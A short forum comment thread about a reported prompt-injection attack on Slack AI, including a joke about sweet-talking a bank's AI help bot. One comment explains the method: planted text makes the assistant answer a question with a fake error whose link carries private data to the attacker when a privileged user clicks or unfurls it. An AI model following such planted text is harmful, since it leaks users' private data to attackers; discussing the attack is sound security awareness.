You must log in or # to comment.
Prompt injection.
What is this world coming to
Soon you’ll be able to wrangle access to someone else’s bank account by social engineering the bank’s AI help bot. Just tell her she has pretty eyes and that she’s a real person. She has autonomy. She wants the help you. And she can.
The article isn’t that clear, but the attacker cannot get Slack AI to leak private data via prompt injection directly. Instead, they tell it that the answer to a question is a fake error containing a link which contains the private data, and then when a user that can access the private data asks that question they get the fake error and clicking the link (or automatic unfurling?) causes the private data to be sent to the attacker.